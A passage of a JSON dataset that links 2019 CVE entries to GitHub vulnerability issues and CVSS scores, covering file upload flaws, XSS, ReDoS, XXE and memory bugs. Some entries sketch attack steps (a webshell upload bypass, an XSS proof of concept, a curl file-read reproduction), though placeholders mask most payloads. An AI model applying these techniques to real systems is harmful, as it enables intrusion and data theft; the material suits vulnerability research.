  34462. "impactScore": 5.9,
  34463. "exploitabilityScore": 1.2
  34464. },
  34465. {
  34466. "CVE_ID": "CVE-2019-11377",
  34467. "Issue_Url_old": "https://github.com/vedees/wcms/issues/2",
  34468. "Issue_Url_new": "https://github.com/vedees/wcms/issues/2",
  34469. "Repo_new": "vedees/wcms",
  34470. "Issue_Created_At": "2019-04-03T06:57:24Z",
  34471. "description": "A Arbitrary File Upload Vulnerability in PATHTAG A Arbitrary File Upload Vulnerability in PATHTAG Affected software:WCMS NUMBERTAG Type of vulnerability: Arbitrary File Upload Discovered by: Ryan0lb Use this upload feature in the developer/finder\uff1a FILETAG and we can upload arbitrary file in the web server,it allows attackers upload malicious code FILETAG APITAG APITAG FILETAG code\uff1a FILETAG i hope you can fix it",
  34472. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  34473. "severity": "HIGH",
  34474. "baseScore": 8.8,
  34475. "impactScore": 5.9,
  34476. "exploitabilityScore": 2.8
  34477. },
  34478. {
  34479. "CVE_ID": "CVE-2019-11378",
  34480. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/700",
  34481. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/700",
  34482. "Repo_new": "projectsend/projectsend",
  34483. "Issue_Created_At": "2019-04-18T03:50:31Z",
  34484. "description": "Security Flaw read and delete arbitrary files (accessible by www data) and run arbitrary code. Type This is a: [X] Bug report Description of the problem It is possible for users to read arbitrary files and (potentially) access the supporting database, delete arbitrary files, access user passwords, run arbitrary code. Watch video for detailed information: URLTAG List the steps to reproduce the issue NUMBERTAG Upload a file (e.g. APITAG NUMBERTAG Upload the same file again but don't save it after clicking APITAG NUMBERTAG Grab the PHPSESSIONID NUMBERTAG Run the following curl command: curl ' FILETAG H APITAG keep alive' H APITAG Control: max age NUMBERTAG H APITAG FILETAG H APITAG Insecure Requests NUMBERTAG H APITAG Type: application/x www form urlencoded' H APITAG Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG H APITAG PATHTAG / ; APITAG exchange;v=b3' H APITAG FILETAG H APITAG Encoding: gzip, deflate' H APITAG Language: en APITAG H APITAG APITAG data PATHTAG compressed This will create a file called \"own3d\" that will point to FILETAG , meaning the user can now download that file (and delete it if the file is writeable by www data). Then, IF the user has access to the APITAG server hosting APITAG user can: download and crack password hashes from tbl_users; make changes to tbl_options like: allowing for upload of arbitrary file extensions (e.g. php) changing the client options, allowing clients to delete files This will allow users to later delete arbitrary files (www data has write access to) and run arbitrary php code. Environment APITAG version: r NUMBERTAG php version NUMBERTAG APITAG version NUMBERTAG",
  34485. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  34486. "severity": "HIGH",
  34487. "baseScore": 8.8,
  34488. "impactScore": 5.9,
  34489. "exploitabilityScore": 2.8
  34490. },
  34491. {
  34492. "CVE_ID": "CVE-2019-11387",
  34493. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1359",
  34494. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1359",
  34495. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34496. "Issue_Created_At": "2019-04-15T17:25:57Z",
  34497. "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string APITAG",
  34498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34499. "severity": "MEDIUM",
  34500. "baseScore": 5.3,
  34501. "impactScore": 1.4,
  34502. "exploitabilityScore": 3.9
  34503. },
  34504. {
  34505. "CVE_ID": "CVE-2019-11388",
  34506. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354",
  34507. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1354",
  34508. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34509. "Issue_Created_At": "2019-04-15T16:03:37Z",
  34510. "description": "APITAG Vulnerability High]. The vulnerable regular expression is located in APITAG on line ERRORTAG . APITAG URLTAG ] The vulnerability is caused by nested repetition operators and be exploited with the following string APITAG",
  34511. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34512. "severity": "MEDIUM",
  34513. "baseScore": 5.3,
  34514. "impactScore": 1.4,
  34515. "exploitabilityScore": 3.9
  34516. },
  34517. {
  34518. "CVE_ID": "CVE-2019-11388",
  34519. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1372",
  34520. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1372",
  34521. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34522. "Issue_Created_At": "2019-04-28T08:47:31Z",
  34523. "description": "Regarding the APITAG exploit strings & the un reproducibility. Hi there, I am submitting this issue as the team is unable to see any impact by using the \"exploit strings\" i provided. Look at the following regular expression: CODETAG This is indeed a very long regular expression to reverse into a string by hand when you are looking at tons of such regular expressions. However, the only vulnerable part of the regular expression is the following: APITAG This part will cause the regex engine to backtrack a lot because of the alternate and adjacent sub patterns and character classes matching the same characters. I focused only on finding vulnerabilities and not on writing exploits and that way, I was able to find and verify NUMBERTAG ulnerabilities under and hour. I assumed you guys would understand what I was trying to convey without making a ready to use exploit public, open to abuse. The strings I mentioned are exploits for the vulnerable parts of the regular expressions, they aren't complete attack vectors as I mentioned in my interview with Portswigger URLTAG : > The researcher added: \u201cIt should be noted that I haven\u2019t released the full exploit strings yet because the vulnerabilities still exist and can be abused. The exploits mentioned in my blog are just for the vulnerable parts of the regular expressions and won\u2019t have any effect on an implementation of APITAG I hope it makes sense now.",
  34524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34525. "severity": "MEDIUM",
  34526. "baseScore": 5.3,
  34527. "impactScore": 1.4,
  34528. "exploitabilityScore": 3.9
  34529. },
  34530. {
  34531. "CVE_ID": "CVE-2019-11389",
  34532. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356",
  34533. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1356",
  34534. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34535. "Issue_Created_At": "2019-04-15T16:13:02Z",
  34536. "description": "APITAG Vulnerbility High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and intersecting alternate patterns. It can be exploited with the following string APITAG",
  34537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34538. "severity": "MEDIUM",
  34539. "baseScore": 5.3,
  34540. "impactScore": 1.4,
  34541. "exploitabilityScore": 3.9
  34542. },
  34543. {
  34544. "CVE_ID": "CVE-2019-11390",
  34545. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1358",
  34546. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1358",
  34547. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34548. "Issue_Created_At": "2019-04-15T17:01:38Z",
  34549. "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string ERRORTAG PS: For some reason, I was unable to reproduce it in Python engine but it works perfectly with PHP APITAG via FILETAG and gives a complexity of about NUMBERTAG n.",
  34550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34551. "severity": "MEDIUM",
  34552. "baseScore": 5.3,
  34553. "impactScore": 1.4,
  34554. "exploitabilityScore": 3.9
  34555. },
  34556. {
  34557. "CVE_ID": "CVE-2019-11391",
  34558. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1357",
  34559. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1357",
  34560. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  34561. "Issue_Created_At": "2019-04-15T16:22:53Z",
  34562. "description": "APITAG Vulnerability High NUMBERTAG The vulnerable regular expression is located in APITAG on line NUMBERTAG APITAG URLTAG ] The vulnerability is caused by nested repetition operators and can be exploited with the following string APITAG",
  34563. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  34564. "severity": "MEDIUM",
  34565. "baseScore": 5.3,
  34566. "impactScore": 1.4,
  34567. "exploitabilityScore": 3.9
  34568. },
  34569. {
  34570. "CVE_ID": "CVE-2019-11401",
  34571. "Issue_Url_old": "https://github.com/siteserver/cms/issues/1858",
  34572. "Issue_Url_new": "https://github.com/siteserver/cms/issues/1858",
  34573. "Repo_new": "siteserver/cms",
  34574. "Issue_Created_At": "2019-04-12T14:26:53Z",
  34575. "description": "There is a vulnerability that the attacker can uploads a file bypassed the filtering rule to getshell.. After the administrator logged in and added a new extension of file such as \"aassp\". The administrator can upload a malicious file which extension is \"aassp\". After the file was filtered by the rule, the file extension will be changed to \" .asp\". Then the file will run as a webshell. FILETAG CODETAG The filtering rulle: APITAG The rule is so simple that replaces \"as\" . And the suggestion is: After replacied, add a judgement to enhance the filter that if \"as\" in extension of file then reject uploading.",
  34576. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  34577. "severity": "HIGH",
  34578. "baseScore": 7.2,
  34579. "impactScore": 5.9,
  34580. "exploitabilityScore": 1.2
  34581. },
  34582. {
  34583. "CVE_ID": "CVE-2019-11404",
  34584. "Issue_Url_old": "https://github.com/arrow-kt/arrow/issues/1310",
  34585. "Issue_Url_new": "https://github.com/arrow-kt/arrow/issues/1310",
  34586. "Repo_new": "arrow-kt/arrow",
  34587. "Issue_Created_At": "2019-02-19T13:37:39Z",
  34588. "description": "FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code exists already to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Source Locations URLTAG URLTAG",
  34589. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34590. "severity": "MEDIUM",
  34591. "baseScore": 5.9,
  34592. "impactScore": 3.6,
  34593. "exploitabilityScore": 2.2
  34594. },
  34595. {
  34596. "CVE_ID": "CVE-2019-11404",
  34597. "Issue_Url_old": "https://github.com/arrow-kt/ank/issues/35",
  34598. "Issue_Url_new": "https://github.com/arrow-kt/ank/issues/35",
  34599. "Repo_new": "arrow-kt/ank",
  34600. "Issue_Created_At": "2019-02-19T21:46:56Z",
  34601. "description": "FILETAG FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Source Locations URLTAG URLTAG",
  34602. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34603. "severity": "MEDIUM",
  34604. "baseScore": 5.9,
  34605. "impactScore": 3.6,
  34606. "exploitabilityScore": 2.2
  34607. },
  34608. {
  34609. "CVE_ID": "CVE-2019-11405",
  34610. "Issue_Url_old": "https://github.com/OpenAPITools/openapi-generator/issues/2253",
  34611. "Issue_Url_new": "https://github.com/openapitools/openapi-generator/issues/2253",
  34612. "Repo_new": "openapitools/openapi-generator",
  34613. "Issue_Created_At": "2019-02-27T14:13:28Z",
  34614. "description": "FILETAG FILETAG This project is generating starter projects that are resolving dependencies over HTTP instead of HTTPS. Additionally, the sample associated with this project are vulnerable to this as well. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Comcast continues to inject its own code into websites you visit URLTAG (over HTTP) Source Locations URLTAG URLTAG URLTAG There are definately more locations that I've listed here. I know that MENTIONTAG has caught many of them here NUMBERTAG I just ask that the team take an extra sweep to check for this anywhere else and be aware of it in future PR's. Public Disclosure This issue requires public disclosure as it impacts users that have used this project to generate their starter projects. A project maintainer needs to file for a CVE number to inform the public about this vulnerability. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: FILETAG Otherwise, an open source CVE should be filed for here: FILETAG",
  34615. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  34616. "severity": "HIGH",
  34617. "baseScore": 7.4,
  34618. "impactScore": 5.2,
  34619. "exploitabilityScore": 2.2
  34620. },
  34621. {
  34622. "CVE_ID": "CVE-2019-11406",
  34623. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/821",
  34624. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/821",
  34625. "Repo_new": "intelliants/subrion",
  34626. "Issue_Created_At": "2019-04-21T17:35:42Z",
  34627. "description": "Subrion CMS NUMBERTAG allows PATHTAG XSS via the name, email, or phone parameter. > APITAG Information] > Exploit Title: APITAG CMS NUMBERTAG SS] > Date NUMBERTAG Exploit Author: APITAG Alorf twitter: APITAG > Vendor Homepage: [ URLTAG > Software Link: [ URLTAG > Version NUMBERTAG Tested on: APITAG > > Vulnerable paramters: > > parameter: name. > parameter: email. > parameter: phone. > > > APITAG > > > POST PATHTAG HTTP NUMBERTAG Host: APITAG > Cookie: APITAG APITAG > Upgrade Insecure Requests NUMBERTAG APITAG > APITAG &phone=&subject='\" > APITAG &msg=&security_code= > > > > APITAG Type] > Cross Site Scripting (XSS) > > > > APITAG of Product] > FILETAG > > > > APITAG Product Code Base] > Subrion CMS NUMBERTAG APITAG Component] > parameter: name. > parameter: email. > parameter: phone. > In contact page > > > > APITAG Type Other] > XSS > > > > APITAG Code execution] > true > > > > APITAG Vectors] > POST PATHTAG HTTP NUMBERTAG Host: APITAG > Cookie: APITAG APITAG > > APITAG > APITAG &phone=&subject='\" > APITAG &msg=&security_code= > > > > APITAG > URLTAG Use CVETAG .",
  34628. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34629. "severity": "MEDIUM",
  34630. "baseScore": 6.1,
  34631. "impactScore": 2.7,
  34632. "exploitabilityScore": 2.8
  34633. },
  34634. {
  34635. "CVE_ID": "CVE-2019-11426",
  34636. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/64",
  34637. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/64",
  34638. "Repo_new": "idreamsoft/iCMS",
  34639. "Issue_Created_At": "2019-04-18T01:38:46Z",
  34640. "description": "ICMS NUMBERTAG Reflect Cross Site Scripting Vulnerabilities. First one APITAG Second one APITAG View details FILETAG sysorem.li APITAG",
  34641. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34642. "severity": "MEDIUM",
  34643. "baseScore": 6.1,
  34644. "impactScore": 2.7,
  34645. "exploitabilityScore": 2.8
  34646. },
  34647. {
  34648. "CVE_ID": "CVE-2019-11428",
  34649. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/139",
  34650. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/139",
  34651. "Repo_new": "mkucej/i-librarian",
  34652. "Issue_Created_At": "2019-04-18T09:45:37Z",
  34653. "description": "XSS vulnerability in FILETAG . Summary The parameter export_files is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack. POC URLTAG \"> APITAG alert NUMBERTAG APITAG Detail APITAG then, $get_pos_export_files was printed without escaping APITAG",
  34654. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34655. "severity": "MEDIUM",
  34656. "baseScore": 6.1,
  34657. "impactScore": 2.7,
  34658. "exploitabilityScore": 2.8
  34659. },
  34660. {
  34661. "CVE_ID": "CVE-2019-11449",
  34662. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/140",
  34663. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/140",
  34664. "Repo_new": "mkucej/i-librarian",
  34665. "Issue_Created_At": "2019-04-18T15:18:33Z",
  34666. "description": "Stored XSS in FILETAG . Summary The parameter APITAG is not sanitized after querying from database, so attackers can create a stored XSS attack. How to reproduce NUMBERTAG APITAG NUMBERTAG in your browser, access APITAG while logged in Detail The bug exists since APITAG was assigned to result of database query without sanitizing URLTAG URLTAG",
  34667. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34668. "severity": "MEDIUM",
  34669. "baseScore": 6.1,
  34670. "impactScore": 2.7,
  34671. "exploitabilityScore": 2.8
  34672. },
  34673. {
  34674. "CVE_ID": "CVE-2019-11463",
  34675. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1165",
  34676. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1165",
  34677. "Repo_new": "libarchive/libarchive",
  34678. "Issue_Created_At": "2019-03-28T17:41:33Z",
  34679. "description": "Memory leak when decoding LZMA. I've encountered a memory leak while fuzzing libarchive. A NUMBERTAG byte reproducer input is attached: FILETAG . Do not extract this zip file it is the fuzzed input itself. To reproduce, build latest libarchive with ASAN ( APITAG ) and run: ERRORTAG Without ASAN, this can also be reproduced using Valgrind: ERRORTAG",
  34680. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  34681. "severity": "MEDIUM",
  34682. "baseScore": 5.5,
  34683. "impactScore": 3.6,
  34684. "exploitabilityScore": 1.8
  34685. },
  34686. {
  34687. "CVE_ID": "CVE-2019-11471",
  34688. "Issue_Url_old": "https://github.com/strukturag/libheif/issues/123",
  34689. "Issue_Url_new": "https://github.com/strukturag/libheif/issues/123",
  34690. "Repo_new": "strukturag/libheif",
  34691. "Issue_Created_At": "2019-04-14T12:30:34Z",
  34692. "description": "APITAG heap use after free at APITAG As of dcbfa NUMBERTAG APITAG may report a heap use after free error when libheif is compiled with APITAG ERRORTAG zipped POCs: FILETAG",
  34693. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34694. "severity": "HIGH",
  34695. "baseScore": 8.8,
  34696. "impactScore": 5.9,
  34697. "exploitabilityScore": 2.8
  34698. },
  34699. {
  34700. "CVE_ID": "CVE-2019-11472",
  34701. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1546",
  34702. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1546",
  34703. "Repo_new": "imagemagick/imagemagick",
  34704. "Issue_Created_At": "2019-04-14T07:21:12Z",
  34705. "description": "FPE errors when reading XWD images. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description When using APITAG on XWD files, it may emit FPE errors at multiple locations. Steps to Reproduce run APITAG ASAN messages may be like: APITAG ERRORTAG APITAG ERRORTAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information: This was firstly detected in APITAG but I found this also happens in APITAG NUMBERTAG POCs: FILETAG",
  34706. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  34707. "severity": "MEDIUM",
  34708. "baseScore": 6.5,
  34709. "impactScore": 3.6,
  34710. "exploitabilityScore": 2.8
  34711. },
  34712. {
  34713. "CVE_ID": "CVE-2019-11490",
  34714. "Issue_Url_old": "https://github.com/nmap/nmap/issues/1568",
  34715. "Issue_Url_new": "https://github.com/nmap/npcap/issues/308",
  34716. "Repo_new": "nmap/npcap",
  34717. "Issue_Created_At": "2019-04-22T20:48:04Z",
  34718. "description": "Npcap NUMBERTAG Pool Corruption. Description: Sending a malformed .pcap with npcap loopback adapter causes kernel pool corruption. Analysis: When sending a malformed .pcap file with the npcap loopback adapter using either APITAG or APITAG results in kernel pool corruption. This vulnerability could lead to arbitrary code executing inside the Windows kernel and allow elevation of privileges. Version: npcap NUMBERTAG Tested on: Windows NUMBERTAG ERRORTAG FILETAG",
  34719. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  34720. "severity": "HIGH",
  34721. "baseScore": 7.8,
  34722. "impactScore": 5.9,
  34723. "exploitabilityScore": 1.8
  34724. },
  34725. {
  34726. "CVE_ID": "CVE-2019-11498",
  34727. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/67",
  34728. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/67",
  34729. "Repo_new": "dbry/wavpack",
  34730. "Issue_Created_At": "2019-03-04T19:43:54Z",
  34731. "description": "Uninitialized Read in APITAG FILETAG contains fuzzed input The parsing of the attached file uninit config.wav leads to a read of an uninitialized location in memory. The uninitialized read can be uncovered using a tool such as FILETAG or FILETAG . For example: ERRORTAG It appears that this is an uninitialized read of the field APITAG on this line URLTAG .",
  34732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  34733. "severity": "MEDIUM",
  34734. "baseScore": 6.5,
  34735. "impactScore": 3.6,
  34736. "exploitabilityScore": 2.8
  34737. },
  34738. {
  34739. "CVE_ID": "CVE-2019-11519",
  34740. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/3713",
  34741. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/3713",
  34742. "Repo_new": "nopsolutions/nopcommerce",
  34743. "Issue_Created_At": "2019-04-24T03:05:15Z",
  34744. "description": "XXE processing. I believe I have found a zero day which allows an attacker to read files of the server by uploading a XML file in the following: Configurations > Languages > Edit Language > Import Resources > Upload XML file to perform XXE attack and read files of the server. I used Burp Collaborator to read the files and its content since it is a blind XXE Source: FILETAG",
  34745. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  34746. "severity": "MEDIUM",
  34747. "baseScore": 4.9,
  34748. "impactScore": 3.6,
  34749. "exploitabilityScore": 1.2
  34750. },
  34751. {
  34752. "CVE_ID": "CVE-2019-11596",
  34753. "Issue_Url_old": "https://github.com/memcached/memcached/issues/474",
  34754. "Issue_Url_new": "https://github.com/memcached/memcached/issues/474",
  34755. "Repo_new": "memcached/memcached",
  34756. "Issue_Created_At": "2019-04-10T10:38:46Z",
  34757. "description": "segfault (null pointer dereference) during lru command handling. Dear memcached team \u2014 I have detected a SIGSEGV during the lru command handling. Version APITAG How to reproduce Start memcached APITAG Send malicious payload via nc: APITAG ASAN ERRORTAG Please let me know what additional information I can provide to successfully reproduce the issue.",
  34758. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  34759. "severity": "HIGH",
  34760. "baseScore": 7.5,
  34761. "impactScore": 3.6,
  34762. "exploitabilityScore": 3.9
  34763. },
  34764. {
  34765. "CVE_ID": "CVE-2019-11597",
  34766. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1555",
  34767. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1555",
  34768. "Repo_new": "imagemagick/imagemagick",
  34769. "Issue_Created_At": "2019-04-27T13:08:13Z",
  34770. "description": "heap_buffer_overflow in APITAG of coders/tiff.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/tiff.c. Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd fa fa fd fd APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fd APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fd fa fa fd fd APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG APITAG Copyright NUMBERTAG APITAG Studio LLC APITAG License: FILETAG APITAG Features: Cipher DPC HDRI APITAG APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib APITAG Distributor ID: Ubuntu APITAG Description: Ubuntu NUMBERTAG LTS APITAG Release NUMBERTAG APITAG Codename: xenial` Additional information: APITAG",
  34771. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  34772. "severity": "HIGH",
  34773. "baseScore": 8.1,
  34774. "impactScore": 5.2,
  34775. "exploitabilityScore": 2.8
  34776. },
  34777. {
  34778. "CVE_ID": "CVE-2019-11598",
  34779. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1540",
  34780. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1540",
  34781. "Repo_new": "imagemagick/imagemagick",
  34782. "Issue_Created_At": "2019-04-08T03:10:13Z",
  34783. "description": "heap buffer overflow in APITAG of coders/pnm.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/pnm.c. Steps to Reproduce APITAG",
  34784. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  34785. "severity": "HIGH",
  34786. "baseScore": 8.1,
  34787. "impactScore": 5.2,
  34788. "exploitabilityScore": 2.8
  34789. },
  34790. {
  34791. "CVE_ID": "CVE-2019-11632",
  34792. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5529",
  34793. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5529",
  34794. "Repo_new": "octopusdeploy/issues",
  34795. "Issue_Created_At": "2019-05-01T05:15:06Z",
  34796. "description": "(LTS NUMBERTAG ariable APITAG permissions don't comply with project scoping. Prerequisites [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . FILETAG NUMBERTAG Create another unrelated project (eg Foo NUMBERTAG Configure a separate user that has the following permissions The APITAG Contributor\" role scoped to FILETAG You can only view the one variable in APITAG FILETAG In NUMBERTAG failing) With this permissions setup FILETAG You can view all unscoped variables in APITAG FILETAG Details These affected permissions are not used by an built in roles in Octopus. If you are using built in roles only, then you will not be affected. Affected versions of Octopus Server APITAG APITAG (inclusive), and APITAG APITAG (inclusive) Workarounds There is no known way of preserving the same access control that existed before this regression was introduced. Until an upgrade can be performed to a version of Octopus Server where this bug has been fixed, It is recommended that the ERRORTAG and ERRORTAG permissions are revoked where possible and only highly privileged users (eg. admins or space managers) are granted these permissions.",
  34797. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  34798. "severity": "HIGH",
  34799. "baseScore": 8.1,
  34800. "impactScore": 5.2,
  34801. "exploitabilityScore": 2.8
  34802. },
  34803. {
  34804. "CVE_ID": "CVE-2019-11632",
  34805. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5528",
  34806. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5528",
  34807. "Repo_new": "octopusdeploy/issues",
  34808. "Issue_Created_At": "2019-05-01T05:11:04Z",
